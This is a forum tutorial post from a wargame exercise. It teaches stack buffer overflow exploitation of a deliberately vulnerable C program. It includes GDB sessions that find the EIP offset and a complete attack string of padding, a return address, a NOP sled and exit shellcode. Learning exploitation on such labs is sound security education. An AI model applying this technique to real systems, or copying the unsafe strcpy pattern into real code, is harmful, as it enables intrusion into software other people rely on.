1. We have moved from vBulletin to XenForo and you are viewing the site in the middle of the move. Though the functional aspect of everything is working fine, we are still working on other changes including the new design on Xenforo.
    Dismiss Notice

Stack Overflow Code Execution Basics

Discussion in 'Ethical hacking Tips' started by lionaneesh, Feb 10, 2011.

  1. lionaneesh

    lionaneesh New Member

    Joined:
    Mar 21, 2010
    Messages:
    848
    Likes Received:
    224
    Trophy Points:
    0
    Occupation:
    Student
    Location:
    India
    This is a continuation of my previous article on Stack Overflows - Basics of EIP Overwrite..I suggest a glance over it before reading further...

    Again in this article we'll be using a vulnerable program to demonstrate our attack..
    Our main motive is to change the direction of the vulnerable program and make it do what we want from it to do...

    In this article I am now bringing the exploitation to a new level..We'll be exploiting a simple Wargame level example

    And i'll be exploiting this code using their machine only..

    Exploiting


    Code:
    #include <stdio.h>
    
    #include <string.h>
    
    int main(int argc, char **argv) {
    
    	char buf[128];
    
    	if(argc < 2) return 1;
    
    	strcpy(buf, argv[1]);
    
    	printf("%s\n", buf);	
    
    	return 0;
    
    }
    I'll be using a basic exit shellcode for demonstration purposes but any shellcode of a considerable size can be used to exploit this program..

    SO lets wear our grey thinking hats and get started..

    Basically to exploit this program we have to overwrite th EIP register which we have already learnt How? In the previos tutorial...So...I'll nnot be repeating that...

    Now what we want is to overwrite the EIP and make it point to our shellcode to gramt us the remote controler..

    So lets first ssh to their machine :-

    Code:
    aneesh@aneesh-laptop:~$ ssh level5@io.smashthestack.org -p2224
    
    level5@io.smashthestack.org's password: 
    
     ______   _____
    
    /\__  _\ /\  __`\
    
    \/_/\ \/ \ \ \/\ \      Levels are in /levels
    
       \ \ \  \ \ \ \ \     Passes are in ~/.pass
    
        \_\ \__\ \ \_\ \
    
        /\_____\\ \_____\   Server admin: beach (beach@smashthestack.org)
    
        \/_____/ \/_____/   Server janitor: bla
    
    
    
            1. No DoS, local or otherwise
    
            2. Do not try to connect to remote systems from this box
    
            3. Only two connections per IP are allowed
    
            4. Quotas are in place so don't waste resources
    
            5. This rules list is not all inclusive and is subject to change
    
            6. Have fuN++
    
    
    
    				(28 levels)
    
    
    
    - use long(>5char) names in /tmp, short stuff is periodically deleted, as are
    
    easily guessable ones
    
    - o and feel free to leave your email in /home/email.list (it's writeonly)
    
    
    
    -  Thanks everybody for the new translations!
    
    
    
    level5@io:~$
    level5@io:~$ cd /levels/
    
    level5@io:/levels$ ls
    
    beta	       level06_alt	 level10       level16	      level23.c
    
    level01        level06_alt.c	 level10.c     level16.c      level24
    
    level02        level06_alt.pass  level11       level16.pass   level24.c
    
    level02_alt    level06.c	 level11.c     level17	      level25
    
    level02_alt.c  level07		 level12       level17.c      level25.c
    
    level03        level07_alt	 level12.c     level18	      level26
    
    level03.c      level07_alt.c	 level12.pass  level18.c      level26.l
    
    level04        level07.c	 level13       level18_cross  level26.y
    
    level04.c      level08		 level13.c     level19	      level27
    
    level05        level08_alt	 level14       level19.c      level27.c
    
    level05_alt    level08_alt.cpp	 level14.c     level20	      level27.pass
    
    level05_alt.c  level08.c	 level15       level21	      level28
    
    level05.c      level09		 level15.c     level22	      level28.c
    
    level06        level09.c	 level15.pass  level23
    
    level5@io:/levels$ cat level0
    
    level01           level04.c         level06_alt.c     level08
    
    level02           level05           level06_alt.pass  level08_alt
    
    level02_alt       level05_alt       level06.c         level08_alt.cpp
    
    level02_alt.c     level05_alt.c     level07           level08.c
    
    level03           level05.c         level07_alt       level09
    
    level03.c         level06           level07_alt.c     level09.c
    
    level04           level06_alt       level07.c         
    
    level5@io:/levels$ cat level0
    
    level01           level04.c         level06_alt.c     level08
    
    level02           level05           level06_alt.pass  level08_alt
    
    level02_alt       level05_alt       level06.c         level08_alt.cpp
    
    level02_alt.c     level05_alt.c     level07           level08.c
    
    level03           level05.c         level07_alt       level09
    
    level03.c         level06           level07_alt.c     level09.c
    
    level04           level06_alt       level07.c         
    
    level5@io:/levels$ cat level0
    
    level01           level04.c         level06_alt.c     level08
    
    level02           level05           level06_alt.pass  level08_alt
    
    level02_alt       level05_alt       level06.c         level08_alt.cpp
    
    level02_alt.c     level05_alt.c     level07           level08.c
    
    level03           level05.c         level07_alt       level09
    
    level03.c         level06           level07_alt.c     level09.c
    
    level04           level06_alt       level07.c         
    
    level5@io:/levels$ cat level05
    
    level05        level05_alt    level05_alt.c  level05.c      
    
    level5@io:/levels$
    
    Note : i'll not be revealing the password for this level as its not allowed..

    Lets now run it in GDB and exploit :-

    Code:
    level5@io:/levels$ gdb ./level05
    
    GNU gdb 6.8-debian
    
    Copyright (C) 2008 Free Software Foundation, Inc.
    
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    
    This is free software: you are free to change and redistribute it.
    
    There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
    
    and "show warranty" for details.
    
    This GDB was configured as "i486-linux-gnu"...
    
    (gdb)
    
    Now lets just place a breakpoint at

    Now lets place a breakpoint on the beginning of the program and lets run it...

    Code:
    (gdb) break main
    
    Breakpoint 1 at 0x80483bd
    
    
    Lets just run it with a argument of 160 A's..
    We'll be using basic python code to make our Attack-string(input)...
    Code:
    (gdb) run `python -c 'print"\x41"*160'`
    Starting program: /levels/level05 `python -c 'print"\x41"*160'`
    Breakpoint 1, 0x080483bd in main ()
    
    Now just step down the program and see what happens

    Code:
    (gdb) s
    
    Single stepping until exit from function main, 
    
    which has no line number information.
    
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    
    0x41414141 in ?? ()
    
    (gdb) 
    
    
    Ok that's pretty obvious that we have overwriiten the EIP with 0x41414141...(As its giving a cannot access memory at adress...As 0x41414141 is a random address and is not present in the present program user space and thus, the program cannot jump to it..)

    Now lets try some various outputs to get a basic structure of what's happening..

    Code:
    (gdb) run `python -c 'print"\x41"*140'`
    
    The program being debugged has been started already.
    
    Start it from the beginning? (y or n) y
    
    
    
    Starting program: /levels/level05 `python -c 'print"\x41"*140'`
    
    
    
    Breakpoint 1, 0x080483bd in main ()
    
    (gdb) s
    
    Single stepping until exit from function main, 
    
    which has no line number information.
    
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    
    Cannot access memory at address 0x41414145
    
    (gdb)
    
    So , now can you feel something …

    It basically means that to overwrite EIP with our desired Address we conclude with the following attack string :-

    Code:
    [Garbage string]     [EIP]
           |                          |
           |                          |
    Should be 140        The desired 
    chars long	        address overwrite
    
    Lets test it :-

    Code:
    (gdb) run `python -c 'print"\x41"*140+"\x42"*4'`
    
    The program being debugged has been started already.
    
    Start it from the beginning? (y or n) y
    
    
    
    Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4'`
    
    
    
    Breakpoint 1, 0x080483bd in main ()
    
    (gdb) s
    
    Single stepping until exit from function main, 
    
    which has no line number information.
    
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
    
    0x42424242 in ?? ()
    
    
    Boom... We have total control over EIP overwrite...
    Now we need to inject our shellcode..and point to it..

    Lets first look where our data goes..

    Code:
    (gdb) run `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'`
    
    The program being debugged has been started already.
    
    Start it from the beginning? (y or n) y
    
    
    
    Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'`
    
    
    
    Breakpoint 1, 0x080483bd in main ()
    
    (gdb) s
    
    Single stepping until exit from function main, 
    
    which has no line number information.
    
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCC
    
    0x42424242 in ?? ()
    
    (gdb) x/10bx $esp
    
    0xbfffdc80:	0x43	0x43	0x43	0x43	0x43	0x43	0x43	0x43
    
    0xbfffdc88:	0x43	0x43
    
    (gdb) 
    
    
    Ok so from the above we conclude with the following attack-string

    Code:
    [Garbage string]     [EIP]			[ESP]
           |                          |				   |
           |                          |				   |
    Should be 140        The desired 		The desired 
    chars long	        address overwrite           data to enter in esp(stack)
    
    So we have a large about of data space in the ESP..We can just overwrite it with our shellcode and overwrite the EIP with its address..

    Lets do it!!

    We'll again be using the same exit shellcode made in our previous article...

    Code:
    (gdb) run `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'`
    
    The program being debugged has been started already.
    
    Start it from the beginning? (y or n) y
    
    
    
    Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'`
    
    
    
    Breakpoint 1, 0x080483bd in main ()
    
    (gdb) s
    
    Single stepping until exit from function main, 
    
    which has no line number information.
    
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��������������1��#1۳̀
    
    0xbfffdc80 in ?? ()
    
    (gdb) continue
    
    Continuing.
    
    
    
    Program exited with code 07.
    
    (gdb) 
    
    
    Woah!! We did it.. Now the explanation

    Attack-string
    Code:
    "\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"
            |                          |                             |                                   |
            |                          |                             |                                   |
      Garbage             Hard coded 	[NOP - ]                   The exit shellcode
      String                 address of esp in   [SLED ]
    		   the little endian format 
    
    The NOP-Sled is simply a set of \x90(nop) instructions this istruction basically does nothing..
    We used this to make our attack-string more usable... as with every new execution of the program the address will somewhat change..If we'll not be using the nop sled … Our attack-string will fail...

    Thats all for this article..Stay tuned for more
     
    Last edited by a moderator: Mar 10, 2011
  2. lionaneesh

    lionaneesh New Member

    Joined:
    Mar 21, 2010
    Messages:
    848
    Likes Received:
    224
    Trophy Points:
    0
    Occupation:
    Student
    Location:
    India
    Thanks for accepting...
    Hope people can get a better understanding of Stack overflows
     

Share This Page